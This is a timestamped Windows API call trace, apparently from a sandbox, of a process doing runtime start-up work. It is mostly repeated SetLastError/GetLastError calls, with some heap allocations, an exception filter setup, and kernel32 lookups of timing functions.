	[0147.068] SetLastError (dwErrCode=0x0) 
	[0147.068] GetLastError () returned 0x0
	[0147.069] SetLastError (dwErrCode=0x0) 
	[0147.069] GetLastError () returned 0x0
	[0147.069] SetLastError (dwErrCode=0x0) 
	[0147.069] GetLastError () returned 0x0
	[0147.069] SetLastError (dwErrCode=0x0) 
	[0147.069] GetLastError () returned 0x0
	[0147.069] SetLastError (dwErrCode=0x0) 
	[0147.069] GetLastError () returned 0x0
	[0147.070] SetLastError (dwErrCode=0x0) 
	[0147.070] GetLastError () returned 0x0
	[0147.070] SetLastError (dwErrCode=0x0) 
	[0147.070] GetLastError () returned 0x0
	[0147.070] SetLastError (dwErrCode=0x0) 
	[0147.070] GetLastError () returned 0x0
	[0147.070] SetLastError (dwErrCode=0x0) 
	[0147.070] GetLastError () returned 0x0
	[0147.071] SetLastError (dwErrCode=0x0) 
	[0147.071] GetLastError () returned 0x0
	[0147.071] SetLastError (dwErrCode=0x0) 
	[0147.071] GetLastError () returned 0x0
	[0147.071] SetLastError (dwErrCode=0x0) 
	[0147.071] GetLastError () returned 0x0
	[0147.071] SetLastError (dwErrCode=0x0) 
	[0147.072] GetLastError () returned 0x0
	[0147.072] SetLastError (dwErrCode=0x0) 
	[0147.072] GetLastError () returned 0x0
	[0147.072] SetLastError (dwErrCode=0x0) 
	[0147.072] GetLastError () returned 0x0
	[0147.072] SetLastError (dwErrCode=0x0) 
	[0147.072] GetLastError () returned 0x0
	[0147.073] SetLastError (dwErrCode=0x0) 
	[0147.073] GetLastError () returned 0x0
	[0147.073] SetLastError (dwErrCode=0x0) 
	[0147.073] GetLastError () returned 0x0
	[0147.073] SetLastError (dwErrCode=0x0) 
	[0147.073] GetLastError () returned 0x0
	[0147.073] SetLastError (dwErrCode=0x0) 
	[0147.073] GetLastError () returned 0x0
	[0147.074] SetLastError (dwErrCode=0x0) 
	[0147.074] GetLastError () returned 0x0
	[0147.074] SetLastError (dwErrCode=0x0) 
	[0147.074] GetLastError () returned 0x0
	[0147.074] SetLastError (dwErrCode=0x0) 
	[0147.074] GetLastError () returned 0x0
	[0147.075] SetLastError (dwErrCode=0x0) 
	[0147.075] GetLastError () returned 0x0
	[0147.075] SetLastError (dwErrCode=0x0) 
	[0147.075] GetLastError () returned 0x0
	[0147.075] SetLastError (dwErrCode=0x0) 
	[0147.075] GetLastError () returned 0x0
	[0147.075] SetLastError (dwErrCode=0x0) 
	[0147.075] GetLastError () returned 0x0
	[0147.076] SetLastError (dwErrCode=0x0) 
	[0147.076] GetLastError () returned 0x0
	[0147.076] SetLastError (dwErrCode=0x0) 
	[0147.077] GetLastError () returned 0x0
	[0147.077] SetLastError (dwErrCode=0x0) 
	[0147.077] GetLastError () returned 0x0
	[0147.077] SetLastError (dwErrCode=0x0) 
	[0147.077] GetLastError () returned 0x0
	[0147.077] SetLastError (dwErrCode=0x0) 
	[0147.077] GetLastError () returned 0x0
	[0147.078] SetLastError (dwErrCode=0x0) 
	[0147.078] GetLastError () returned 0x0
	[0147.078] SetLastError (dwErrCode=0x0) 
	[0147.078] GetLastError () returned 0x0
	[0147.078] SetLastError (dwErrCode=0x0) 
	[0147.078] GetLastError () returned 0x0
	[0147.079] SetLastError (dwErrCode=0x0) 
	[0147.079] GetLastError () returned 0x0
	[0147.079] SetLastError (dwErrCode=0x0) 
	[0147.079] GetLastError () returned 0x0
	[0147.079] SetLastError (dwErrCode=0x0) 
	[0147.079] GetLastError () returned 0x0
	[0147.079] SetLastError (dwErrCode=0x0) 
	[0147.080] GetLastError () returned 0x0
	[0147.080] SetLastError (dwErrCode=0x0) 
	[0147.080] GetLastError () returned 0x0
	[0147.080] SetLastError (dwErrCode=0x0) 
	[0147.080] GetLastError () returned 0x0
	[0147.080] SetLastError (dwErrCode=0x0) 
	[0147.080] GetLastError () returned 0x0
	[0147.081] SetLastError (dwErrCode=0x0) 
	[0147.081] GetLastError () returned 0x0
	[0147.081] SetLastError (dwErrCode=0x0) 
	[0147.081] GetLastError () returned 0x0
	[0147.081] SetLastError (dwErrCode=0x0) 
	[0147.081] GetLastError () returned 0x0
	[0147.081] SetLastError (dwErrCode=0x0) 
	[0147.081] GetLastError () returned 0x0
	[0147.082] SetLastError (dwErrCode=0x0) 
	[0147.082] GetLastError () returned 0x0
	[0147.082] SetLastError (dwErrCode=0x0) 
	[0147.082] GetLastError () returned 0x0
	[0147.082] SetLastError (dwErrCode=0x0) 
	[0147.082] GetLastError () returned 0x0
	[0147.082] SetLastError (dwErrCode=0x0) 
	[0147.083] GetLastError () returned 0x0
	[0147.083] SetLastError (dwErrCode=0x0) 
	[0147.083] GetLastError () returned 0x0
	[0147.083] SetLastError (dwErrCode=0x0) 
	[0147.083] GetLastError () returned 0x0
	[0147.083] SetLastError (dwErrCode=0x0) 
	[0147.083] GetLastError () returned 0x0
	[0147.084] SetLastError (dwErrCode=0x0) 
	[0147.084] GetLastError () returned 0x0
	[0147.084] SetLastError (dwErrCode=0x0) 
	[0147.084] GetLastError () returned 0x0
	[0147.084] SetLastError (dwErrCode=0x0) 
	[0147.084] GetLastError () returned 0x0
	[0147.084] SetLastError (dwErrCode=0x0) 
	[0147.084] GetLastError () returned 0x0
	[0147.085] SetLastError (dwErrCode=0x0) 
	[0147.085] GetLastError () returned 0x0
	[0147.085] SetLastError (dwErrCode=0x0) 
	[0147.085] GetLastError () returned 0x0
	[0147.085] SetLastError (dwErrCode=0x0) 
	[0147.085] GetLastError () returned 0x0
	[0147.085] SetLastError (dwErrCode=0x0) 
	[0147.086] GetLastError () returned 0x0
	[0147.086] SetLastError (dwErrCode=0x0) 
	[0147.086] GetLastError () returned 0x0
	[0147.086] SetLastError (dwErrCode=0x0) 
	[0147.086] GetLastError () returned 0x0
	[0147.086] SetLastError (dwErrCode=0x0) 
	[0147.086] GetLastError () returned 0x0
	[0147.087] SetLastError (dwErrCode=0x0) 
	[0147.087] GetLastError () returned 0x0
	[0147.087] SetLastError (dwErrCode=0x0) 
	[0147.087] GetLastError () returned 0x0
	[0147.087] SetLastError (dwErrCode=0x0) 
	[0147.087] GetLastError () returned 0x0
	[0147.087] SetLastError (dwErrCode=0x0) 
	[0147.088] GetLastError () returned 0x0
	[0147.088] SetLastError (dwErrCode=0x0) 
	[0147.088] GetLastError () returned 0x0
	[0147.088] SetLastError (dwErrCode=0x0) 
	[0147.088] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x0, Size=0x6b) returned 0xf61748
	[0147.088] GetLastError () returned 0x0
	[0147.088] SetLastError (dwErrCode=0x0) 
	[0147.088] GetLastError () returned 0x0
	[0147.089] SetLastError (dwErrCode=0x0) 
	[0147.089] GetLastError () returned 0x0
	[0147.089] SetLastError (dwErrCode=0x0) 
	[0147.089] GetLastError () returned 0x0
	[0147.089] SetLastError (dwErrCode=0x0) 
	[0147.089] GetLastError () returned 0x0
	[0147.089] SetLastError (dwErrCode=0x0) 
	[0147.089] GetLastError () returned 0x0
	[0147.090] SetLastError (dwErrCode=0x0) 
	[0147.090] GetLastError () returned 0x0
	[0147.090] SetLastError (dwErrCode=0x0) 
	[0147.090] GetLastError () returned 0x0
	[0147.090] SetLastError (dwErrCode=0x0) 
	[0147.090] GetLastError () returned 0x0
	[0147.090] SetLastError (dwErrCode=0x0) 
	[0147.091] GetLastError () returned 0x0
	[0147.091] SetLastError (dwErrCode=0x0) 
	[0147.091] GetLastError () returned 0x0
	[0147.091] SetLastError (dwErrCode=0x0) 
	[0147.091] GetLastError () returned 0x0
	[0147.091] SetLastError (dwErrCode=0x0) 
	[0147.091] GetLastError () returned 0x0
	[0147.092] SetLastError (dwErrCode=0x0) 
	[0147.093] GetLastError () returned 0x0
	[0147.093] SetLastError (dwErrCode=0x0) 
	[0147.093] GetLastError () returned 0x0
	[0147.093] SetLastError (dwErrCode=0x0) 
	[0147.093] GetLastError () returned 0x0
	[0147.093] SetLastError (dwErrCode=0x0) 
	[0147.093] GetLastError () returned 0x0
	[0147.093] SetLastError (dwErrCode=0x0) 
	[0147.094] GetLastError () returned 0x0
	[0147.094] SetLastError (dwErrCode=0x0) 
	[0147.094] GetLastError () returned 0x0
	[0147.094] SetLastError (dwErrCode=0x0) 
	[0147.094] GetLastError () returned 0x0
	[0147.094] SetLastError (dwErrCode=0x0) 
	[0147.094] GetLastError () returned 0x0
	[0147.095] SetLastError (dwErrCode=0x0) 
	[0147.095] GetLastError () returned 0x0
	[0147.095] SetLastError (dwErrCode=0x0) 
	[0147.095] GetLastError () returned 0x0
	[0147.095] SetLastError (dwErrCode=0x0) 
	[0147.095] GetLastError () returned 0x0
	[0147.095] SetLastError (dwErrCode=0x0) 
	[0147.095] GetLastError () returned 0x0
	[0147.095] SetLastError (dwErrCode=0x0) 
	[0147.096] GetLastError () returned 0x0
	[0147.096] SetLastError (dwErrCode=0x0) 
	[0147.096] GetLastError () returned 0x0
	[0147.096] SetLastError (dwErrCode=0x0) 
	[0147.096] GetLastError () returned 0x0
	[0147.096] SetLastError (dwErrCode=0x0) 
	[0147.096] GetLastError () returned 0x0
	[0147.097] SetLastError (dwErrCode=0x0) 
	[0147.097] GetLastError () returned 0x0
	[0147.097] SetLastError (dwErrCode=0x0) 
	[0147.097] GetLastError () returned 0x0
	[0147.097] SetLastError (dwErrCode=0x0) 
	[0147.097] GetLastError () returned 0x0
	[0147.097] SetLastError (dwErrCode=0x0) 
	[0147.097] GetLastError () returned 0x0
	[0147.098] SetLastError (dwErrCode=0x0) 
	[0147.098] GetLastError () returned 0x0
	[0147.098] SetLastError (dwErrCode=0x0) 
	[0147.098] GetLastError () returned 0x0
	[0147.098] SetLastError (dwErrCode=0x0) 
	[0147.098] GetLastError () returned 0x0
	[0147.098] SetLastError (dwErrCode=0x0) 
	[0147.099] GetLastError () returned 0x0
	[0147.099] SetLastError (dwErrCode=0x0) 
	[0147.099] GetLastError () returned 0x0
	[0147.099] SetLastError (dwErrCode=0x0) 
	[0147.099] GetLastError () returned 0x0
	[0147.099] SetLastError (dwErrCode=0x0) 
	[0147.099] GetLastError () returned 0x0
	[0147.100] SetLastError (dwErrCode=0x0) 
	[0147.100] GetLastError () returned 0x0
	[0147.100] SetLastError (dwErrCode=0x0) 
	[0147.100] GetLastError () returned 0x0
	[0147.100] SetLastError (dwErrCode=0x0) 
	[0147.100] GetLastError () returned 0x0
	[0147.100] SetLastError (dwErrCode=0x0) 
	[0147.101] GetLastError () returned 0x0
	[0147.101] SetLastError (dwErrCode=0x0) 
	[0147.101] GetLastError () returned 0x0
	[0147.101] SetLastError (dwErrCode=0x0) 
	[0147.101] GetLastError () returned 0x0
	[0147.101] SetLastError (dwErrCode=0x0) 
	[0147.101] GetLastError () returned 0x0
	[0147.102] SetLastError (dwErrCode=0x0) 
	[0147.102] GetLastError () returned 0x0
	[0147.102] SetLastError (dwErrCode=0x0) 
	[0147.102] GetLastError () returned 0x0
	[0147.102] SetLastError (dwErrCode=0x0) 
	[0147.102] GetLastError () returned 0x0
	[0147.102] SetLastError (dwErrCode=0x0) 
	[0147.103] GetLastError () returned 0x0
	[0147.103] SetLastError (dwErrCode=0x0) 
	[0147.103] GetLastError () returned 0x0
	[0147.103] SetLastError (dwErrCode=0x0) 
	[0147.103] GetLastError () returned 0x0
	[0147.103] SetLastError (dwErrCode=0x0) 
	[0147.103] GetLastError () returned 0x0
	[0147.103] SetLastError (dwErrCode=0x0) 
	[0147.103] GetLastError () returned 0x0
	[0147.104] SetLastError (dwErrCode=0x0) 
	[0147.104] GetLastError () returned 0x0
	[0147.104] SetLastError (dwErrCode=0x0) 
	[0147.104] GetLastError () returned 0x0
	[0147.104] SetLastError (dwErrCode=0x0) 
	[0147.104] GetLastError () returned 0x0
	[0147.104] SetLastError (dwErrCode=0x0) 
	[0147.105] GetLastError () returned 0x0
	[0147.105] SetLastError (dwErrCode=0x0) 
	[0147.105] GetLastError () returned 0x0
	[0147.105] SetLastError (dwErrCode=0x0) 
	[0147.105] GetLastError () returned 0x0
	[0147.105] SetLastError (dwErrCode=0x0) 
	[0147.105] GetLastError () returned 0x0
	[0147.106] SetLastError (dwErrCode=0x0) 
	[0147.106] GetLastError () returned 0x0
	[0147.106] SetLastError (dwErrCode=0x0) 
	[0147.106] GetLastError () returned 0x0
	[0147.106] SetLastError (dwErrCode=0x0) 
	[0147.106] GetLastError () returned 0x0
	[0147.106] SetLastError (dwErrCode=0x0) 
	[0147.106] GetLastError () returned 0x0
	[0147.107] SetLastError (dwErrCode=0x0) 
	[0147.107] GetLastError () returned 0x0
	[0147.107] SetLastError (dwErrCode=0x0) 
	[0147.107] GetLastError () returned 0x0
	[0147.125] SetLastError (dwErrCode=0x0) 
	[0147.125] GetLastError () returned 0x0
	[0147.125] SetLastError (dwErrCode=0x0) 
	[0147.125] GetLastError () returned 0x0
	[0147.126] SetLastError (dwErrCode=0x0) 
	[0147.126] GetLastError () returned 0x0
	[0147.126] SetLastError (dwErrCode=0x0) 
	[0147.126] GetLastError () returned 0x0
	[0147.126] SetLastError (dwErrCode=0x0) 
	[0147.126] GetLastError () returned 0x0
	[0147.126] SetLastError (dwErrCode=0x0) 
	[0147.126] GetLastError () returned 0x0
	[0147.126] SetLastError (dwErrCode=0x0) 
	[0147.127] GetLastError () returned 0x0
	[0147.127] SetLastError (dwErrCode=0x0) 
	[0147.127] GetLastError () returned 0x0
	[0147.127] SetLastError (dwErrCode=0x0) 
	[0147.127] GetLastError () returned 0x0
	[0147.127] SetLastError (dwErrCode=0x0) 
	[0147.127] GetLastError () returned 0x0
	[0147.128] SetLastError (dwErrCode=0x0) 
	[0147.128] GetLastError () returned 0x0
	[0147.128] SetLastError (dwErrCode=0x0) 
	[0147.128] GetLastError () returned 0x0
	[0147.128] SetLastError (dwErrCode=0x0) 
	[0147.128] GetLastError () returned 0x0
	[0147.128] SetLastError (dwErrCode=0x0) 
	[0147.128] GetLastError () returned 0x0
	[0147.129] SetLastError (dwErrCode=0x0) 
	[0147.129] GetLastError () returned 0x0
	[0147.129] SetLastError (dwErrCode=0x0) 
	[0147.129] GetLastError () returned 0x0
	[0147.129] SetLastError (dwErrCode=0x0) 
	[0147.129] GetLastError () returned 0x0
	[0147.130] SetLastError (dwErrCode=0x0) 
	[0147.130] GetLastError () returned 0x0
	[0147.130] SetLastError (dwErrCode=0x0) 
	[0147.130] GetLastError () returned 0x0
	[0147.130] SetLastError (dwErrCode=0x0) 
	[0147.130] GetLastError () returned 0x0
	[0147.130] SetLastError (dwErrCode=0x0) 
	[0147.130] GetLastError () returned 0x0
	[0147.131] SetLastError (dwErrCode=0x0) 
	[0147.131] GetLastError () returned 0x0
	[0147.131] SetLastError (dwErrCode=0x0) 
	[0147.131] GetLastError () returned 0x0
	[0147.131] SetLastError (dwErrCode=0x0) 
	[0147.131] GetLastError () returned 0x0
	[0147.131] SetLastError (dwErrCode=0x0) 
	[0147.131] GetLastError () returned 0x0
	[0147.132] SetLastError (dwErrCode=0x0) 
	[0147.132] GetLastError () returned 0x0
	[0147.132] SetLastError (dwErrCode=0x0) 
	[0147.132] GetLastError () returned 0x0
	[0147.132] SetLastError (dwErrCode=0x0) 
	[0147.132] GetLastError () returned 0x0
	[0147.132] SetLastError (dwErrCode=0x0) 
	[0147.132] GetLastError () returned 0x0
	[0147.133] SetLastError (dwErrCode=0x0) 
	[0147.133] GetLastError () returned 0x0
	[0147.133] SetLastError (dwErrCode=0x0) 
	[0147.133] GetLastError () returned 0x0
	[0147.133] SetLastError (dwErrCode=0x0) 
	[0147.133] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x90) returned 0xf617c0
	[0147.133] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x1f) returned 0xf61858
	[0147.133] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x2e) returned 0xf61880
	[0147.133] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x37) returned 0xf618b8
	[0147.133] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x3c) returned 0xf618f8
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x31) returned 0xf61940
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x14) returned 0xf61980
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x24) returned 0xf619a0
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0xd) returned 0xf619d0
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x1d) returned 0xf619e8
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x31) returned 0xf61a10
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x15) returned 0xf61a50
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x17) returned 0xf61a70
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0xe) returned 0xf61a90
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0xa2) returned 0xf61aa8
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x3e) returned 0xf61b58
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x1b) returned 0xf61ba0
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x1d) returned 0xf61bc8
	[0147.134] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x49) returned 0xf61bf0
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x12) returned 0xf61c48
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x18) returned 0xf61c68
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x1b) returned 0xf61c88
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x24) returned 0xf61cb0
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x29) returned 0xf61ce0
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x1e) returned 0xf61d18
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x6b) returned 0xf61d40
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x17) returned 0xf61db8
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0xf) returned 0xf61dd8
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x16) returned 0xf61df0
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x2a) returned 0xf61e10
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x29) returned 0xf61e48
	[0147.135] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x12) returned 0xf61e80
	[0147.136] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x21) returned 0xf61ea0
	[0147.136] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x16) returned 0xf61ed0
	[0147.136] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x22) returned 0xf61ef0
	[0147.136] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x12) returned 0xf61f20
	[0147.137] HeapFree (in: hHeap=0xf60000, dwFlags=0x0, lpMem=0xf60fd0 | out: hHeap=0xf60000) returned 1
	[0147.141] RtlAllocateHeap (HeapHandle=0xf60000, Flags=0x8, Size=0x80) returned 0xf61f40
	[0147.142] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe21bd0) returned 0x0
	[0147.143] RtlSizeHeap (HeapHandle=0xf60000, Flags=0x0, MemoryPointer=0xf61f40) returned 0x80
	[0147.144] GetLastError () returned 0x0
	[0147.144] SetLastError (dwErrCode=0x0) 
	[0147.144] GetLastError () returned 0x0
	[0147.144] SetLastError (dwErrCode=0x0) 
	[0147.144] GetLastError () returned 0x0
	[0147.145] SetLastError (dwErrCode=0x0) 
	[0147.145] GetLastError () returned 0x0
	[0147.145] SetLastError (dwErrCode=0x0) 
	[0147.145] GetLastError () returned 0x0
	[0147.145] SetLastError (dwErrCode=0x0) 
	[0147.145] GetLastError () returned 0x0
	[0147.145] SetLastError (dwErrCode=0x0) 
	[0147.146] GetLastError () returned 0x0
	[0147.146] SetLastError (dwErrCode=0x0) 
	[0147.146] GetLastError () returned 0x0
	[0147.146] SetLastError (dwErrCode=0x0) 
	[0147.146] GetLastError () returned 0x0
	[0147.146] SetLastError (dwErrCode=0x0) 
	[0147.146] GetLastError () returned 0x0
	[0147.147] SetLastError (dwErrCode=0x0) 
	[0147.147] GetLastError () returned 0x0
	[0147.147] SetLastError (dwErrCode=0x0) 
	[0147.147] GetLastError () returned 0x0
	[0147.147] SetLastError (dwErrCode=0x0) 
	[0147.147] GetLastError () returned 0x0
	[0147.147] SetLastError (dwErrCode=0x0) 
	[0147.147] GetLastError () returned 0x0
	[0147.148] SetLastError (dwErrCode=0x0) 
	[0147.148] GetLastError () returned 0x0
	[0147.148] SetLastError (dwErrCode=0x0) 
	[0147.148] GetLastError () returned 0x0
	[0147.148] SetLastError (dwErrCode=0x0) 
	[0147.148] GetLastError () returned 0x0
	[0147.148] SetLastError (dwErrCode=0x0) 
	[0147.149] GetLastError () returned 0x0
	[0147.149] SetLastError (dwErrCode=0x0) 
	[0147.149] GetLastError () returned 0x0
	[0147.149] SetLastError (dwErrCode=0x0) 
	[0147.149] GetLastError () returned 0x0
	[0147.149] SetLastError (dwErrCode=0x0) 
	[0147.149] GetLastError () returned 0x0
	[0147.150] SetLastError (dwErrCode=0x0) 
	[0147.150] GetLastError () returned 0x0
	[0147.150] SetLastError (dwErrCode=0x0) 
	[0147.150] GetLastError () returned 0x0
	[0147.150] SetLastError (dwErrCode=0x0) 
	[0147.150] GetLastError () returned 0x0
	[0147.150] SetLastError (dwErrCode=0x0) 
	[0147.150] GetLastError () returned 0x0
	[0147.151] SetLastError (dwErrCode=0x0) 
	[0147.151] GetLastError () returned 0x0
	[0147.151] SetLastError (dwErrCode=0x0) 
	[0147.151] GetLastError () returned 0x0
	[0147.151] SetLastError (dwErrCode=0x0) 
	[0147.151] GetLastError () returned 0x0
	[0147.151] SetLastError (dwErrCode=0x0) 
	[0147.151] GetLastError () returned 0x0
	[0147.152] SetLastError (dwErrCode=0x0) 
	[0147.152] GetLastError () returned 0x0
	[0147.152] SetLastError (dwErrCode=0x0) 
	[0147.152] GetLastError () returned 0x0
	[0147.152] SetLastError (dwErrCode=0x0) 
	[0147.152] GetLastError () returned 0x0
	[0147.152] SetLastError (dwErrCode=0x0) 
	[0147.153] GetLastError () returned 0x0
	[0147.153] SetLastError (dwErrCode=0x0) 
	[0147.153] GetLastError () returned 0x0
	[0147.153] SetLastError (dwErrCode=0x0) 
	[0147.153] GetLastError () returned 0x0
	[0147.153] SetLastError (dwErrCode=0x0) 
	[0147.153] GetLastError () returned 0x0
	[0147.153] SetLastError (dwErrCode=0x0) 
	[0147.153] GetLastError () returned 0x0
	[0147.154] SetLastError (dwErrCode=0x0) 
	[0147.154] GetLastError () returned 0x0
	[0147.154] SetLastError (dwErrCode=0x0) 
	[0147.154] GetLastError () returned 0x0
	[0147.155] SetLastError (dwErrCode=0x0) 
	[0147.155] GetLastError () returned 0x0
	[0147.155] SetLastError (dwErrCode=0x0) 
	[0147.155] GetLastError () returned 0x0
	[0147.155] SetLastError (dwErrCode=0x0) 
	[0147.155] GetLastError () returned 0x0
	[0147.155] SetLastError (dwErrCode=0x0) 
	[0147.155] GetLastError () returned 0x0
	[0147.156] SetLastError (dwErrCode=0x0) 
	[0147.156] GetLastError () returned 0x0
	[0147.156] SetLastError (dwErrCode=0x0) 
	[0147.156] GetLastError () returned 0x0
	[0147.156] SetLastError (dwErrCode=0x0) 
	[0147.156] GetLastError () returned 0x0
	[0147.156] SetLastError (dwErrCode=0x0) 
	[0147.156] GetLastError () returned 0x0
	[0147.157] SetLastError (dwErrCode=0x0) 
	[0147.157] GetLastError () returned 0x0
	[0147.157] SetLastError (dwErrCode=0x0) 
	[0147.157] GetLastError () returned 0x0
	[0147.157] SetLastError (dwErrCode=0x0) 
	[0147.157] GetLastError () returned 0x0
	[0147.157] SetLastError (dwErrCode=0x0) 
	[0147.157] GetLastError () returned 0x0
	[0147.157] SetLastError (dwErrCode=0x0) 
	[0147.158] GetLastError () returned 0x0
	[0147.158] SetLastError (dwErrCode=0x0) 
	[0147.158] GetLastError () returned 0x0
	[0147.158] SetLastError (dwErrCode=0x0) 
	[0147.158] GetLastError () returned 0x0
	[0147.158] SetLastError (dwErrCode=0x0) 
	[0147.158] GetLastError () returned 0x0
	[0147.158] SetLastError (dwErrCode=0x0) 
	[0147.158] GetLastError () returned 0x0
	[0147.159] SetLastError (dwErrCode=0x0) 
	[0147.159] GetLastError () returned 0x0
	[0147.159] SetLastError (dwErrCode=0x0) 
	[0147.159] GetLastError () returned 0x0
	[0147.159] SetLastError (dwErrCode=0x0) 
	[0147.159] GetLastError () returned 0x0
	[0147.159] SetLastError (dwErrCode=0x0) 
	[0147.159] GetLastError () returned 0x0
	[0147.160] SetLastError (dwErrCode=0x0) 
	[0147.160] GetLastError () returned 0x0
	[0147.160] SetLastError (dwErrCode=0x0) 
	[0147.160] GetLastError () returned 0x0
	[0147.160] SetLastError (dwErrCode=0x0) 
	[0147.160] GetLastError () returned 0x0
	[0147.160] SetLastError (dwErrCode=0x0) 
	[0147.160] GetLastError () returned 0x0
	[0147.161] SetLastError (dwErrCode=0x0) 
	[0147.161] GetLastError () returned 0x0
	[0147.161] SetLastError (dwErrCode=0x0) 
	[0147.161] GetLastError () returned 0x0
	[0147.161] SetLastError (dwErrCode=0x0) 
	[0147.161] GetLastError () returned 0x0
	[0147.161] SetLastError (dwErrCode=0x0) 
	[0147.161] GetLastError () returned 0x0
	[0147.162] SetLastError (dwErrCode=0x0) 
	[0147.162] GetLastError () returned 0x0
	[0147.162] SetLastError (dwErrCode=0x0) 
	[0147.162] GetLastError () returned 0x0
	[0147.162] SetLastError (dwErrCode=0x0) 
	[0147.162] GetLastError () returned 0x0
	[0147.162] SetLastError (dwErrCode=0x0) 
	[0147.162] GetLastError () returned 0x0
	[0147.163] SetLastError (dwErrCode=0x0) 
	[0147.163] GetLastError () returned 0x0
	[0147.163] SetLastError (dwErrCode=0x0) 
	[0147.163] GetLastError () returned 0x0
	[0147.163] SetLastError (dwErrCode=0x0) 
	[0147.163] GetLastError () returned 0x0
	[0147.163] SetLastError (dwErrCode=0x0) 
	[0147.163] GetLastError () returned 0x0
	[0147.163] SetLastError (dwErrCode=0x0) 
	[0147.164] GetLastError () returned 0x0
	[0147.164] SetLastError (dwErrCode=0x0) 
	[0147.164] GetLastError () returned 0x0
	[0147.164] SetLastError (dwErrCode=0x0) 
	[0147.164] GetLastError () returned 0x0
	[0147.164] SetLastError (dwErrCode=0x0) 
	[0147.164] GetLastError () returned 0x0
	[0147.164] SetLastError (dwErrCode=0x0) 
	[0147.164] GetLastError () returned 0x0
	[0147.165] SetLastError (dwErrCode=0x0) 
	[0147.165] GetLastError () returned 0x0
	[0147.165] SetLastError (dwErrCode=0x0) 
	[0147.165] GetLastError () returned 0x0
	[0147.165] SetLastError (dwErrCode=0x0) 
	[0147.165] GetLastError () returned 0x0
	[0147.165] SetLastError (dwErrCode=0x0) 
	[0147.165] GetLastError () returned 0x0
	[0147.165] SetLastError (dwErrCode=0x0) 
	[0147.166] GetLastError () returned 0x0
	[0147.166] SetLastError (dwErrCode=0x0) 
	[0147.166] GetLastError () returned 0x0
	[0147.166] SetLastError (dwErrCode=0x0) 
	[0147.166] GetLastError () returned 0x0
	[0147.166] SetLastError (dwErrCode=0x0) 
	[0147.166] GetLastError () returned 0x0
	[0147.166] SetLastError (dwErrCode=0x0) 
	[0147.166] GetLastError () returned 0x0
	[0147.167] SetLastError (dwErrCode=0x0) 
	[0147.167] GetLastError () returned 0x0
	[0147.167] SetLastError (dwErrCode=0x0) 
	[0147.167] GetLastError () returned 0x0
	[0147.167] SetLastError (dwErrCode=0x0) 
	[0147.167] GetLastError () returned 0x0
	[0147.167] SetLastError (dwErrCode=0x0) 
	[0147.167] GetLastError () returned 0x0
	[0147.168] SetLastError (dwErrCode=0x0) 
	[0147.168] GetLastError () returned 0x0
	[0147.168] SetLastError (dwErrCode=0x0) 
	[0147.168] GetLastError () returned 0x0
	[0147.168] SetLastError (dwErrCode=0x0) 
	[0147.168] GetLastError () returned 0x0
	[0147.168] SetLastError (dwErrCode=0x0) 
	[0147.168] GetLastError () returned 0x0
	[0147.169] SetLastError (dwErrCode=0x0) 
	[0147.169] GetLastError () returned 0x0
	[0147.169] SetLastError (dwErrCode=0x0) 
	[0147.169] GetLastError () returned 0x0
	[0147.169] SetLastError (dwErrCode=0x0) 
	[0147.229] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d90000
	[0147.230] GetProcAddress (hModule=0x76d90000, lpProcName="QueryPerformanceFrequency") returned 0x76da8cc0
	[0147.230] GetProcAddress (hModule=0x76d90000, lpProcName="QueryPerformanceCounter") returned 0x76da38a0
	[0147.230] GetProcAddress (hModule=0x76d90000, lpProcName="IsBadCodePtr") returned 0x76dad0e0
	[0147.230] QueryPerformanceFrequency (in: lpFrequency=0x18fcc4 | out: lpFrequency=0x18fcc4*=100000000) returned 1
